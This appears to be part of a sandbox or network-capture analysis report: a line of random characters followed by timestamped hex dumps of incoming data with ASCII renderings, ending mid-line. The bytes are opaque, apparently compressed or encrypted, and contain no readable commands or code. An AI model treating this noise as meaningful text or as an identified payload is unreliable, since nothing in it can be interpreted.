XwJK+z0;"'3OS_VXYbgNcf.rhyH;0]^&i=%FXQC8EqE1bK\?j( VWILI_b~Dp2G ?9!M4m2boJ]C,VA@,[Rj9vP4+a`X#KCclS\|5y
2023-11-18 09:02:40 UTC	6127	IN	Data Raw: f3 a8 8e 80 f3 21 cd 0b fa 83 cd 49 64 9f 1c e8 bb d3 5a 69 bd 0c de 5d ad 6a a2 45 df e5 2b b3 fa 47 c0 82 06 7a 1a 17 f8 fd 79 2a 36 1a 03 99 af 33 2a 53 2e ad a8 55 59 3b 55 af d7 e1 e7 c5 d6 c0 34 06 bf f2 d6 21 ee a4 f2 05 ea 10 cd f3 37 f0 d5 d9 9a 0d 59 d8 f5 56 60 23 eb 55 a8 2c e2 d9 aa 60 70 a3 33 bb 10 1c a8 f6 5b 89 d3 2e 89 81 b8 c8 48 3f 5d 82 f8 a8 1c f2 87 59 f9 59 3b c3 8d c9 d1 12 ff 8a f5 6c 7f 2f 43 9a b7 3c b5 bc c5 ae 79 a1 5a 98 56 35 45 2d 6f 7d 5c f3 0c 61 1f ca 5b d3 35 cf 04 04 c7 4e 61 b1 67 e7 91 e9 39 54 76 8d be 5d ab da 37 e3 ac 75 52 27 55 f3 40 ea 67 6d eb 1d 6a c5 76 15 12 8b eb fb d8 fe 8f a2 9e b2 3e 4f 55 f4 ed 9c 14 c0 61 46 55 bd 2f 39 87 fa e3 4c bd 01 53 bf 17 d8 b3 c0 c0 5b 99 0a 12 e7 1f 12 48 05 fd 5c 8f 3e ca Data Ascii: !IdZi]jE+Gzy63S.UY;U4!7YV`#U,`p3[.H?]YY;l/C<yZV5E-o}\a[5Nag9Tv]7uR'U@gmjv>OUaFU/9LS[H\>
2023-11-18 09:02:40 UTC	6159	IN	Data Raw: 78 38 8a 0a 0c e7 87 de 18 a0 1c f3 c5 5f 21 81 8a 82 88 cf cb 82 f1 f3 5c 77 c9 31 f2 14 8b bb 16 d2 d6 c2 aa d7 cd 90 8c 83 0d dd ea 92 19 3e 71 cf 3e 40 71 99 8e 41 d5 63 a4 29 16 a1 0a f2 81 6a de 18 c7 0e ef 58 ba 9d 93 e5 99 e4 bc cc 17 1f 23 54 f5 87 30 6b d5 66 a1 6a 18 74 d3 18 e3 ed eb 38 ea 9d 0c 0b 38 49 f0 3c 42 15 80 a9 52 4f 5e dc 7d 29 d4 cf dc 73 dc b9 df 7c 80 5f 9f ae 92 ff 05 dc 43 bb c2 9d a3 5d 1d 43 40 f6 c6 20 d0 99 07 84 ca 87 60 e2 28 d8 d8 f8 d5 7d 09 ec 04 5c 04 3c f3 80 cb ad 4e 04 3e 9b f9 b1 3d e8 af 10 cc d7 00 f9 18 e4 b5 22 38 ba cb 6f 63 f6 06 34 27 ad 14 5f a1 74 99 81 93 54 29 be 4e bf a4 90 9f 6f 30 4d af 7e fa 29 23 3b fb 47 98 f1 21 5b 78 1a 92 c1 cb 95 34 ff 43 1f f9 23 11 22 aa 12 32 f8 17 3a cd c5 80 2a 1a f2 e7 Data Ascii: x8_!\w1>q>@qAc)jX#T0kfjt88I<BRO^})s\|_C]C@ `(}\<N>="8oc4'_tT)No0M~)#;G![x4C#"2:*
2023-11-18 09:02:40 UTC	6183	IN	Data Raw: b6 c2 1c 6d 1b 23 7b ef 57 82 5c 4f 98 b6 5d 91 a3 6d e5 39 da f6 ad 9c fb 95 e9 bc 26 d3 b6 ef e7 68 db bc 21 da 56 d8 ef 6a 5b 76 7f e1 55 de bc f4 82 fa 96 bd d0 8f 84 3b 8b 7d bc 00 db b1 fb 1e 40 77 ea 69 14 74 a8 7f 18 e9 fd b0 b5 df f0 d6 47 d5 31 8f 00 fd e7 de fa a8 35 66 17 ec 98 c7 f9 8d 44 56 61 cc 3d 40 bf 47 d0 5d 7d 30 5b 81 7e 93 97 8e aa 60 02 2e b2 3d d9 db 0f 6a 81 f9 3e d0 c7 7b e9 a8 00 e6 db 40 cf 13 74 77 ef 9b bf 03 7a 4f c6 43 c7 6d 6f be 08 f4 f6 8c a7 1f b6 e3 e1 19 d6 5e cb e9 6b 9c 5c 41 7a ec 1a 84 85 b2 ff d9 db 1e 6f c1 cc 7f 02 fa e3 1e 8d 61 f1 96 ff aa 2f 7f 49 7d d9 7b f2 af fa f2 ff 5d 5f ce ff de 0f 9f 10 13 ab 43 db 19 90 62 8b e7 7b ff 6b f8 6e b8 69 2a be 30 69 ca 93 f8 e3 7e 57 e9 45 92 be 19 e2 a9 d4 8c e9 a9 86 Data Ascii: m#{W\O]m9&h!Vj[vU;}@witG15fDVa=@G]}0[~`.=j>{@twzOCmo^k\Azoa/I}{]_Cb{kni*0i~WE
2023-11-18 09:02:40 UTC	6199	IN	Data Raw: 1b 48 9e 09 84 ed f6 03 22 bd 4c ab c7 3e b0 04 d3 fa a9 23 54 8f 32 89 46 0d b2 18 f5 b9 24 b7 7a d5 df e9 5c da 49 64 a0 18 9e b7 0f 22 7a 74 1a 1e a1 59 16 41 f3 2b 0f d4 ae eb 89 4d a8 70 a0 4a a8 28 b7 44 a9 72 af ba 71 10 56 0f fd d2 a8 47 5a 33 0e 89 df e5 f7 0f b5 8b 8c 55 78 ea 96 10 53 70 d1 6a 6a ce 04 6a 8e 4f 6c ad 62 e3 44 43 dd 53 2a 88 b7 ee 47 5a 98 f1 42 43 08 bd 8a 84 86 55 39 20 90 d7 76 da 51 aa ad ad 16 d2 5f 80 ba 6e 0f 77 c1 c1 dd 54 c9 8b ba e1 54 94 82 ff c0 a4 fa 2c 76 82 74 2b 8c ec 1c f0 a2 2f 9f 4f ed 39 d4 83 2b 84 29 4c 31 9b 1e d6 7d 4c 22 6a 5e 3c 81 c1 ad 3f f8 65 fa f6 49 08 91 01 9e 67 a5 8a 97 57 88 a8 72 3e 74 0d e4 77 4d 55 0a b8 68 28 12 84 3f f7 56 fa 6d 98 cb 64 2b 75 3c ee 07 e7 b6 b6 b8 e6 8a 19 de ce 02 1c 8e Data Ascii: H"L>#T2F$z\Id"ztYA+MpJ(DrqVGZ3UxSpjjjOlbDCS*GZBCU9 vQ_nwTT,vt+/O9+)L1}L"j^<?eIgWr>twMUh(?Vmd+u<
2023-11-18 09:02:40 UTC	6215	IN	Data Raw: 7e 86 14 34 ae 40 2d 9a ec 31 9a 32 f9 6f 42 1d 9a ed 11 9a 36 ea 32 70 dc de 04 a5 3e 47 0f 31 46 69 e6 c6 66 20 8f e3 6b 13 57 d6 92 c6 1c a9 16 4f 19 4f e6 1f 6d 3f e0 f3 9d 42 6b 3d 81 c7 e8 03 5f 6b 30 ef 2b 4d a4 5e b6 87 59 41 f8 80 3d c8 4c 1c 1b fe 0c 37 bc d6 2a fa 19 26 91 d2 f0 1c 78 0a af ee f7 d2 e5 fd da c4 e5 b5 c6 51 35 9d 7f b8 fd 38 c6 12 e5 84 52 e8 65 e3 84 a8 28 98 cc 15 0b 98 1f 4a 3e b5 56 31 eb 3d e0 35 f7 71 b5 57 f2 82 24 b8 7a 23 7d 8a 8e bb d6 9e 70 5a 50 06 35 7e d5 20 d6 62 b2 ca 7a c1 20 95 43 a7 fc ac 07 8f 07 fd 36 6b d7 e3 19 6b 9e 4f f4 9c f1 98 f5 49 85 00 43 07 7d 3e dd 55 2b 88 06 9e c6 44 55 34 4f 9a e9 d9 12 08 09 07 b0 4a 78 db c6 ea 86 b5 5a d5 30 0f 33 d2 c1 58 d5 a8 55 24 f5 24 75 93 f6 13 58 d7 d2 09 ea 84 66 Data Ascii: ~4@-12oB62p>G1Fif kWOOm?Bk=_k0+M^YA=L7*&xQ58Re(J>V1=5qW$z#}pZP5~ bz C6kkOIC}>U+DU4OJxZ03XU$$uXf
2023-11-18 09:02:40 UTC	6231	IN	Data Raw: a9 df 42 15 06 ad 14 f5 91 df a2 3d 44 9a 3a 9c 18 e5 e9 b3 fe 76 35 75 79 89 28 60 d1 d6 c7 6f 25 ff f3 3f 91 8a dc d0 78 f0 91 f1 33 07 9f e6 0a 57 8c 9f 49 c0 67 b2 f9 9f 6f f2 9a 23 7c 00 b5 e3 87 0c 8f 21 42 d2 93 b6 79 4e c6 59 d3 cc b1 76 d8 6c 05 10 b6 d8 e0 72 4e 3f 7a 03 59 8a d8 4c 37 27 db 76 52 5c d7 2a d2 66 b1 c7 8b 3a fe f7 fc 25 b5 13 f5 6e 60 57 59 98 dc f0 6f c9 da 54 61 9c d1 12 c0 af 3a 99 53 e5 f8 8d b2 5f 6b f2 cd df 06 3f 84 c6 98 4b 7e e0 93 f4 59 1d 67 05 95 64 c1 27 b9 67 ca 0c a7 47 36 dc ea 35 27 b5 7e 84 5e 0a 0c ba e6 a4 56 f7 ee c3 a6 7e e5 6b 13 c9 bb 76 df c4 ed df 18 3b 8f 8f 38 8b f1 59 07 8d db 6c f2 f3 3d 4b f8 4e da 51 7b 9b f4 5b e3 fb 60 a7 f6 b9 11 ea d7 87 c6 63 fb 8a a0 6b bf 32 a1 ed 39 f6 9e 6f 46 52 12 56 c7 Data Ascii: B=D:v5uy(`o%?x3WIgo#\|!ByNYvlrN?zYL7'vR\*f:%n`WYoTa:S_k?K~Ygd'gG65'~^V~kv;8Yl=KNQ{[`ck29oFRV
2023-11-18 09:02:40 UTC	6364	IN	Data Raw: f9 db 61 4f 66 d1 dd 56 14 72 b9 e6 31 70 4b a4 2a 7f 8b e2 c6 0c ed c5 76 4c cd 5e 0c 79 b2 b2 c1 d5 9a 29 19 e0 67 5d 22 e5 82 93 35 a4 5a 2f 4e 87 03 3e 70 af 2e 91 8a c0 b7 ba 44 2a 06 c7 6a 38 44 2e f6 c2 d1 9b 52 ec 83 c3 60 a5 38 8b fd cc 51 8a 03 ec 67 ae 52 9c ad e4 42 8e f3 72 48 ae 52 cb d7 ca 5a b6 f6 cb bb fd 2d b5 b3 20 e6 ad d7 0f 87 7a 3e 90 e3 c2 be 28 7f 14 ee 4a 71 3d 10 81 45 93 ad 0d ae db ef 81 11 65 23 cd a4 94 52 54 cd 7a 4d 8e ba 5e d8 b0 7d 5f 7b 83 c7 55 d8 ec 2a 6c 0c 83 1c 90 29 f2 f9 ae 30 1c 07 0f fc 05 b2 f6 c1 ed 46 86 dd 03 5c 21 ff c2 46 c1 51 93 2e b7 c1 fa d9 f0 93 23 dc 98 26 ef 19 c5 80 2b 97 83 a7 12 77 03 1e c5 f6 57 96 d8 fd 15 4a be 5f 10 2d a0 08 47 1d ac 74 0d e8 04 19 ac b8 cf 15 99 08 26 87 77 55 e9 64 0a 40 Data Ascii: aOfVr1pKvL^y)g]"5Z/N>p.Dj8D.R`8QgRBrHRZ- z>(Jq=Ee#RTzM^}_{U*l)0F\!FQ.#&+wWJ_-Gt&wUd@
2023-11-18 09:02:40 UTC	6380	IN	Data Raw: 7f 75 7e 77 31 74 11 3a af a7 b6 9d 87 fa c4 48 b1 cf 5a 15 7b bb 74 83 a9 97 3f 95 49 2f f7 1a d1 39 70 9c cc f4 f0 ab 66 8c a6 79 9c a6 9b af 12 34 cd 26 9a 4a a9 bd 93 95 fc 00 de 2f c7 a6 e6 2b 13 73 22 5b 2b c1 b9 3c c0 08 4e 46 e2 ac e0 04 ce 48 1d c8 40 c1 68 28 27 81 57 ba 70 5a bb 54 99 42 5e d7 a9 6d 23 f5 fd e2 f8 7e da d1 60 b6 ff 99 da 81 f1 00 7e c8 00 f3 03 1b 54 f5 e1 7f 74 68 e6 d3 83 f8 7c 15 00 04 8d 3a fb 79 0e 67 94 07 a6 52 27 ff 41 f9 72 5e 3e fa 5c 9f f2 c0 54 6a ea 1f 94 4f e3 e5 5f 8e 2b cf 97 7c 27 70 22 17 fb 28 e3 c4 f5 c0 21 37 f6 81 c7 a3 0e 0e af c3 8d 79 3c 71 fd 8c 3e 00 55 6f 7d fd 7f d3 07 40 80 67 60 3f f4 15 f5 43 df 1d 37 24 a6 af 28 8e be 35 8f f5 4b 1f 80 aa db fe fe bf e9 2b e2 f4 dd f0 ac a9 3e e1 5f 57 45 3e 75 Data Ascii: u~w1t:HZ{t?I/9pfy4&J/+s"[+<NFH@h('WpZTB^m#~`~Tth\|:ygR'Ar^>\TjO_+\|'p"(!7y<q>Uo}@g`?C7$(5K+>_WE>u
2023-11-18 09:02:40 UTC	6396	IN	Data Raw: f1 c2 7d 52 39 ef 13 d7 47 37 ab 5e a1 ff 15 26 ca d2 0f 2a 95 89 aa 7b 0d dc 0f 78 77 cb 0b de 65 eb ec 22 b6 66 58 fd 39 9a b4 06 56 6c 78 9b bd 55 7a d6 d8 35 ee e9 97 3c 03 47 9f 72 da c8 fe 7e b6 0b 90 6d 07 7b bb 62 4d 17 1e cf 0b af 79 ea 5e 19 cc b0 58 d3 e5 6d 96 4b 0e 50 4a 64 27 1d f6 14 b3 e6 13 ed 78 90 b5 ba cb 11 54 ca 8b 02 8a 5f 0e 43 1a 1f f6 97 4f 5e 70 33 89 b1 39 aa b4 86 6e f6 81 af fb ce 67 73 3f b5 f8 ec da 37 33 f3 d9 57 4f 66 e6 b3 7d 4f e2 aa 35 56 2b 30 47 05 69 74 bd d6 e2 73 ac aa be a1 cb 94 ab 96 bc b2 0b 5b 35 6d d1 d5 f6 64 d1 85 a2 4a af 3a 85 d7 7e 05 20 13 35 98 4a 62 cb ec 68 0a e9 c7 b1 91 96 f1 93 98 ec a5 42 21 e3 4e 89 9f 47 fe ea 49 a7 cd 48 38 28 4b b0 7d d6 fb f3 bb 40 87 68 35 b7 e0 d9 c4 91 8a 91 04 4d ed 61 Data Ascii: }R9G7^&*{xwe"fX9VlxUz5<Gr~m{bMy^XmKPJd'xT_CO^p39ngs?73WOf}O5V+0Gits[5mdJ:~ 5JbhB!NGIH8(K}@h5Ma
2023-11-18 09:02:40 UTC	6412	IN	Data Raw: 18 cc 5c d7 c1 00 c6 04 58 7d a0 4e ac 9e 2d 7d 6d c7 bc d5 af 4a 67 db d4 a3 5b 50 f6 97 78 38 65 ea 5e 97 4b 0e f3 15 cd a0 ac 84 8b ff 36 9b a1 6e 72 c9 98 d7 b9 e1 6b 98 de 53 f5 8c 29 a1 64 12 ca ca fa 99 b2 97 59 22 8d 97 c3 60 9b d7 b6 6e 5d 67 f5 11 e3 18 76 be 83 cc 15 03 e1 14 18 78 51 3e 5e 20 9a c5 d3 72 4e 8a ff e8 f1 1a fe 4d 55 8e f8 f9 d4 d8 6a 31 80 f8 33 0b 96 2d fd 99 f8 07 92 58 e3 c6 a4 d0 21 3d b7 04 51 f8 82 7e ee 9a ab 32 87 fe b0 9a ce b8 aa 33 86 d6 37 f1 de 10 82 3e 6e 0e b6 0e fc f7 be c2 32 86 e6 e1 19 cd 82 7a 43 dd d9 90 a6 e3 5e aa 5a 27 90 3b eb a4 1f 5a 10 9f 79 c2 e1 15 9e 17 09 d2 c2 c1 15 50 ee 9a 31 9f e4 75 5c 4f da 75 b8 9a db 84 8f d2 fb 5b 78 b3 b9 ac e2 21 85 5f 7c 61 fa 9c d0 f7 9d 63 fa b0 2e 6a f6 25 4e 6d 50 Data Ascii: \X}N-}mJg[Px8e^K6nrkS)dY"`n]gvxQ>^ rNMUj13-X!=Q~237>n2zC^Z';ZyP1u\Ou[x!_\|ac.j%NmP
2023-11-18 09:02:40 UTC	6428	IN	Data Raw: a0 ee 9b bf 07 03 92 0b 1d c7 c8 84 96 0f 44 83 14 68 12 64 d1 cd 01 fb e5 c6 18 c4 ee f8 ac b0 4d 55 20 de f6 1e 56 7e 02 97 66 9e 1c de 94 79 25 9f 0f 92 ee b8 ad ca c5 40 a6 55 39 f9 28 7e bc 75 6d 7f 7b 0b 83 c0 8e 88 7b ba 86 64 ee 49 01 90 2e f5 24 10 0b dd 54 bc 25 53 b7 ff ed 51 b9 49 6c 47 96 cd 8b 3b 24 b7 82 4d 13 46 81 20 5b 99 23 61 a9 98 28 a9 c4 58 3a b4 52 c2 7a 6c b0 70 0d 8f b6 f2 90 78 17 f7 91 03 e5 9b f6 4b 2c 54 60 21 76 a9 6e 37 b5 d9 11 4b dd 85 12 e5 63 6c 4e bc 0c 05 ae 98 b5 03 21 5e 04 4c e3 1d 57 97 bf a8 58 5f 02 dc 54 5a 70 68 ef f4 52 91 e0 6b 98 44 87 96 a4 85 fb 90 23 d6 eb 37 24 53 bd b8 e7 db 46 1f 19 fb b0 2b 7b 91 47 9b c0 19 36 ab 15 ac 82 99 5d 8a ed c2 2e ec 8e d7 8d f5 82 4a f7 f4 e9 be 17 1b fb bc dc 88 10 d8 54 Data Ascii: DhdMU V~fy%@U9(~um{{dI.$T%SQIlG;$MF [#a(X:RzlpxK,T`!vn7KclN!^LWX_TZphRkD#7$SF+{G6].JT
2023-11-18 09:02:40 UTC	6436	IN	Data Raw: 5e 6b 46 ff 8c d9 5c 2b 41 c0 7d 7f 97 6b 92 63 ce 72 24 73 6b 56 36 7c 83 79 ad bd fc 0b 90 5d 9b 9b 5e 47 c9 05 a1 e7 40 b9 85 bc 49 59 ff 6c 14 29 36 55 15 4c fe 64 03 e2 0f 29 42 33 d3 ed 41 9e 40 ee d3 8a 11 8d 86 fa 56 b0 34 a8 5a c5 b0 9b 6a 1d fe fa 08 02 7a 8a 04 79 dc a2 fe de e4 16 c7 c4 3c ba 57 20 17 40 19 06 60 a6 18 39 1a 04 bd 8b 81 af 61 02 5c 9d e7 c6 85 ee 08 83 60 de b5 dc 37 23 33 10 c9 96 36 56 60 19 f6 d3 da 6e 9c 05 05 d3 eb 83 ab 0e b3 b7 50 ef 09 bd e9 12 41 6c 51 b5 af 14 1b b1 bd 4d 31 d4 f2 b9 0c da 39 f0 fa 6c aa 2f 22 d2 21 12 53 03 c7 6f 37 c9 fa 1b f1 b3 fc 1e b9 94 95 d6 52 ed 97 82 e8 d6 6d 07 60 c2 0a 39 00 97 f7 12 15 1d 05 d4 2e 50 ac 20 84 89 a7 1e 3d 5c f8 50 42 5b b9 44 23 6f 41 b7 1a 69 f0 7c 94 7b 43 ea 39 0f fb Data Ascii: ^kF\+A}kcr$skV6\|y]^G@IYl)6ULd)B3A@V4Zjzy<W @`9a\`7#36V`nPAlQM19l/"!So7Rm`9.P =\PB[D#oAi\|{C9
2023-11-18 09:02:40 UTC	6452	IN	Data Raw: 9f 5a a8 aa b8 11 1d 45 28 ac 86 09 37 e9 1f ef b4 e0 6f 75 ad e5 d8 25 06 19 b4 a8 07 78 79 43 63 40 26 bd 28 50 2d 29 26 f9 fc 5c 71 8f fd 62 12 7c d0 67 b3 65 ef 31 c0 99 c1 54 fc 32 6e 25 56 77 6e c1 6b 11 50 7c a1 0b 97 8a fe 0f 5b 16 93 83 e0 d8 b7 bf a8 90 6d d6 8b 4b d9 17 bb e8 d9 bb 5f 39 4a 33 7c b3 12 99 1e fc b2 05 91 67 df 8d 0b 55 fb d1 8d 0c 9b 80 81 ee 8c 05 e2 16 30 ad 1f 88 04 75 c1 e5 ec 32 f8 a0 5b 21 f6 d8 13 26 e4 a1 32 a8 93 91 5d 33 45 83 72 52 59 23 84 f6 7b e2 90 20 c6 40 33 a9 94 cd b9 ab e4 44 0b 06 bb 4c 2c 2a 5e 4d 57 b7 e0 b8 86 74 ab ea 37 1c a0 a6 21 33 c7 f5 24 7d 14 c8 8b 9d 8f 31 23 29 9d 11 42 07 e8 2c ec 7d 70 8d b5 a4 ca 33 30 03 75 17 a1 10 e7 6b 87 f9 0b ef 43 ef f8 24 c2 f1 7a 1a 70 7e 2f d4 eb 97 40 a6 e6 2d c1 Data Ascii: ZE(7ou%xyCc@&(P-)&\qb\|ge1T2n%VwnkP\|[mK_9J3\|gU0u2[!&2]3ErRY#{ @3DL,*^MWt7!3$}1#)B,}p30ukC$zp~/@-
2023-11-18 09:02:40 UTC	6468	IN	Data Raw: c5 77 f4 96 56 51 8b 7c 7e e5 23 5d 46 1b 2e 28 c0 80 6b 6a 85 6c cf aa 28 f3 83 2d 42 6f f3 5e 5d a2 7b ba 5c 12 b0 da a0 eb df ad 1d 4c 54 cf ad 02 68 cd fe 5c 5b 65 6d a5 cc d3 ed 32 74 6c 58 83 3a c1 71 bf b5 a2 bd 10 e5 46 c5 00 82 b1 eb 6f 73 f9 12 23 e4 da ff a3 c4 9c f1 cc 0e 1a 7a 10 62 8f a5 b2 35 51 67 b5 95 be 4c 81 53 fc dd 27 26 97 42 01 ec 08 91 b8 f0 af 57 54 73 52 8f de ca ed 1b ca 8d 97 1e dc e7 fa 68 af 37 b0 62 a3 9f bc ac 9f 28 1e b7 aa b0 91 e4 95 ad f9 e5 d4 cc 23 0f 4a 2d dd ea 64 d1 04 3c d0 ca fe d3 19 9d 28 a5 1c ff 3e ae e9 fb 12 03 6d cf bc 5f 27 ce 1a b9 c0 31 88 6e 2e af 35 5f f0 ce 92 f8 6f d6 67 1c c6 5c ee 59 aa d6 8c a8 13 e6 f7 e2 82 2f 82 1e 4c 0d ab 3e db 4d c5 90 32 e4 f0 74 c1 92 1b dd f3 a7 f6 6b 01 9d 8d 78 3d 5a Data Ascii: wVQ\|~#]F.(kjl(-Bo^]{\LTh\[em2tlX:qFos#zb5QgLS'&BWTsRh7b(#J-d<(>m_'1n.5_og\Y/L>M2tkx=Z
2023-11-18 09:02:40 UTC	6484	IN	Data Raw: a6 3b 8d 79 58 92 d9 da 82 34 a7 99 bc 43 a3 0a 7e 85 0b ab 0e c2 94 22 2d 05 99 9d 5c c7 b2 7b 18 3e b2 dd 47 b3 d7 cf 19 c7 55 5e 64 d8 7b b4 f6 11 72 ed bd fc d8 e9 9f cd 9a eb b2 6c 04 b9 88 f7 60 68 c3 f2 fd a0 8c 82 c5 f7 5d c3 9a 1e 49 27 69 35 b0 8f e9 b3 e4 09 d8 1a 73 9e 56 41 fa e0 94 9e 0e 65 e6 5b e2 12 39 ca 86 0c ae ee 24 58 fd 85 09 7a ad 54 de da 06 73 7d 11 7e 91 44 f3 4b 61 ce 8a ff 76 92 2e 43 52 cf 63 3f c4 1f 7f 4d 67 21 ed d7 88 db 36 56 11 b2 3b ee 5f 2d 5f 17 98 a1 d5 cc 82 fd c2 56 69 aa 68 86 af 48 77 ba e9 d9 42 cd aa e3 ad 2b 17 ef d3 54 c5 4e 31 0b 14 b7 73 c1 6f c3 06 41 1a 11 19 9f e9 9f 61 4f 13 9b 3e cd 7c d6 2a b3 87 84 58 58 10 1f a0 2e 5c 15 8b 5e 37 d4 22 93 d9 67 e1 a8 35 e2 95 d8 4c 2c 65 c9 21 af f9 dd 3d 2c 0e 0c Data Ascii: ;yX4C~"-\{>GU^d{rl`h]I'i5sVAe[9$XzTs}~DKav.CRc?Mg!6V;_-_VihHwB+TN1soAaO>\|*XX.\^7"g5L,e!=,
2023-11-18 09:02:40 UTC	6500	IN	Data Raw: 91 66 c7 93 3a 0a 72 b1 ed 36 9d de 21 dd 7d 0a 7b 35 1f c3 56 de bb cb b2 0a b6 84 ce a1 c6 1a 46 2f 9f 48 d5 98 73 a4 bd bd a3 e9 c9 c4 64 89 b7 9c 97 7c 2f 88 22 e4 4b 71 3d 2a 47 ee f8 fe e0 f7 03 14 e6 7c 9e 57 bb 8e f5 ea 63 fc 5b 18 3b a2 a1 4a 28 82 37 77 5b c4 d3 c1 f2 87 13 2b 2a c8 ac 70 e1 82 38 9c 12 a0 c4 9e 6b ac 33 8a e9 31 6f a1 76 94 48 cf bc 78 22 82 6a b0 b9 49 71 db de 8b 90 09 82 4d 79 17 e8 cf d8 50 c3 08 07 81 5f 9a 72 ce 0a e4 29 c9 dd 95 67 58 a1 14 ec cf 2f 29 cf ce b3 35 54 77 67 56 ec 95 68 ee bf 9c 9f 74 78 12 d5 30 83 28 d5 36 96 57 a0 8d 1c 99 19 04 af 25 e5 71 83 88 b0 74 38 dd 8a ff 39 7a fd 34 8f 9c 67 a8 c8 6f 13 5d f2 5b 22 d3 8e 63 51 58 9b fc aa 89 65 4e 36 c4 a7 ef 98 f9 af cd 35 8c 16 bc 70 4f cd 71 2a f4 13 b3 3d Data Ascii: f:r6!}{5VF/Hsd\|/"Kq=G\|Wc[;J(7w[+p8k31ovHx"jIqMyP_r)gX/)5TwgVhtx0(6W%qt89z4go]["cQXeN65pOq*=
2023-11-18 09:02:40 UTC	6508	IN	Data Raw: 5c ee 18 88 61 e4 54 6b a2 e8 7f f0 15 c3 ce bc 5b 91 25 7b 1d d3 9f 13 1b 01 5d 43 e8 a1 77 5a 87 79 8b d5 69 f7 df 66 a2 84 0c 66 ac 15 65 bf 74 c0 d2 78 6a 3a 9c 98 62 04 41 95 b2 23 59 c6 b0 c5 22 c0 fa aa c8 94 73 91 5b 64 1b 74 be cb a1 81 b1 c1 26 a1 94 55 04 b3 9c 80 b7 00 6f 36 c7 7f 6d 97 ea f3 f5 55 c5 fe 61 d9 b1 6d 8c a1 02 08 b3 41 e6 e6 57 c6 ff 6e 47 a4 22 2e 2d 21 53 be e3 be 15 ec 23 9d 87 e0 2e cc 6c d0 c7 b7 3d a4 07 5f 69 4e 2b 07 69 4f c5 a3 66 52 91 8f a4 48 b9 40 76 d9 cb 6e 1a 35 9e 50 9f d1 78 b2 b8 0d a8 f8 6e 07 a5 3a df 3c 32 a6 10 bd 73 2f 07 45 66 0f 61 ce c2 08 19 98 33 4b 59 81 b5 78 4f 46 88 ae 29 f8 f5 c2 29 6f 8f e5 8f b0 53 c8 7a 48 da 6f 7e 8a 69 68 ab ba d9 20 0f 96 69 41 a6 92 94 8e 0f 86 df 8d 70 af fe f1 20 50 01 Data Ascii: \aTk[%{]CwZyiffetxj:bA#Y"s[dt&Uo6mUamAWnG".-!S#.l=_iN+iOfRH@vn5Pxn:<2s/Efa3KYxOF))oSzHo~ih iAp P
2023-11-18 09:02:40 UTC	6524	IN	Data Raw: b1 0d fa 12 1f be 59 4f f7 c8 5b ab d7 16 3d 7e 97 9e ec f8 cb 31 2e e0 41 0b 00 a6 6d e9 5e d5 4a c5 bf 1c cc a5 71 94 29 3d 17 43 27 63 c4 c7 8f 1b b7 5f cf df 8e 6a 69 87 c1 29 ab 7b 8d df 07 95 50 a3 1c 8e dc 7f 8a 21 37 1e 26 a7 67 28 b2 c8 23 5a 1d 94 46 1b 3e 72 87 73 08 e2 3b 46 51 be 5b a9 72 b9 f8 45 6d 0c 89 80 0d 7a fb 4c 3f 7f 3d 29 ff ef b2 ec 23 c2 26 cf 8c 2e 28 bf c5 68 47 d9 49 95 f1 67 7e 3a 48 e2 43 5c c8 95 5b b2 f3 22 c9 73 91 b5 78 96 1b 9a 75 5f b2 6b 8c 66 8c 8e c1 e1 de d6 64 31 e1 7b 12 d2 85 8f 52 68 ec 80 26 3d cc 9b e3 57 be 19 42 b9 dd 7d 2b 5b 6d 1b 9e 96 d7 75 83 82 3c 3e 5f f8 a9 36 be 14 c7 ce 9d 05 7e d7 38 37 35 c9 37 8b 9f c6 2d ff 00 41 ff 1b 09 ea d2 b0 04 48 ff fc b5 67 54 39 3d 23 68 0b 7d 97 f3 65 20 a2 f8 33 96 Data Ascii: YO[=~1.Am^Jq)=C'c_ji){P!7&g(#ZF>rs;FQ[rEmzL?=)#&.(hGIg~:HC\["sxu_kfd1{Rh&=WB}+[mu<>_6~8757-AHgT9=#h}e 3
2023-11-18 09:02:40 UTC	6540	IN	Data Raw: 06 e6 00 b7 2b 22 d9 8b 97 5f 54 5e b4 7b f0 75 dc b0 24 34 1d 2f 42 7c 34 13 28 b0 fc c9 d2 ba 3b 60 fb 99 b9 cb 36 44 8d a5 89 0b 92 9f fa 54 de a8 78 56 92 ba a6 f4 59 e5 f6 09 da 46 0c 0b c9 08 c5 60 26 ef 8d 6f c1 1d bf 7b e9 42 fe d3 63 b5 df d1 0b 97 f6 30 af 71 73 db a3 9a 7a 68 67 ff 23 b5 b4 ea fe ee ec 06 67 af 1d ef 6e fe e6 b8 d0 9d f3 fb ac 60 90 44 18 e7 62 c1 f1 98 f8 6b 0c a5 69 85 dd fb d8 ef e0 d2 bc 57 e5 82 ff 52 c6 5a c3 63 38 62 25 33 b1 47 7b 21 b0 41 f9 b2 88 d8 83 4d a7 ce 85 57 e4 0f f6 76 6c e3 29 ce 3c ad af 24 f0 ac ff 54 99 7a c9 76 de 0f 7a 33 47 02 46 12 6d d4 89 21 c9 cf df d7 89 2c ef 44 bf b2 e1 bf 69 7f 82 e5 ea 95 c4 27 d5 c4 f2 8d 4c cf b6 fb fb 3d 38 dc 59 d3 34 e5 52 76 38 62 a1 fd c0 f9 1a e3 68 fe ae f9 93 fa 27 Data Ascii: +"_T^{u$4/B\|4(;`6DTxVYF`&o{Bc0qszhg#gn`DbkiWRZc8b%3G{!AMWvl)<$Tzvz3GFm!,Di'L=8Y4Rv8bh'
2023-11-18 09:02:40 UTC	6556	IN	Data Raw: 7a 02 16 a6 01 e6 09 6a a6 15 0d 89 73 02 16 a2 9d 5e 1b e6 58 cc 5f 3a 39 01 0b f4 0d d1 42 ab 0d 56 92 ac 8b 13 bb ac c8 82 3a 62 95 28 7a 00 0a 3c 01 8b d1 80 68 a0 d5 08 ab 4f d1 03 2c ee 89 6f a0 49 5a 77 42 2d 5a 21 b2 02 9d c0 bd 0a 01 80 b0 be 24 b2 a0 88 3a a0 a6 5d 76 f0 44 8a 42 e3 e8 ff fd 42 c2 9d d5 fe b7 74 48 13 67 20 fe 4f 00 ce 4e 93 d8 e8 85 a3 49 85 08 83 c8 70 02 66 f6 04 cc d2 09 88 09 44 8e ce 4a e5 71 58 1a e8 eb 30 54 a9 1c ba 05 31 73 ba 03 12 2f a4 18 5c 00 d5 12 a1 2a 10 6b 90 35 86 ee 2c 01 6c 1f 74 b7 0e c2 42 ac 9d fe cc 82 67 85 d0 55 e0 12 a0 7b e1 c6 ac 70 1d 24 0a e5 51 e8 6e 2b 84 86 98 3e fd 85 05 6f 0a a1 42 1a c1 35 80 8f c0 5c b9 e0 3a a8 c4 7b 10 6d 74 42 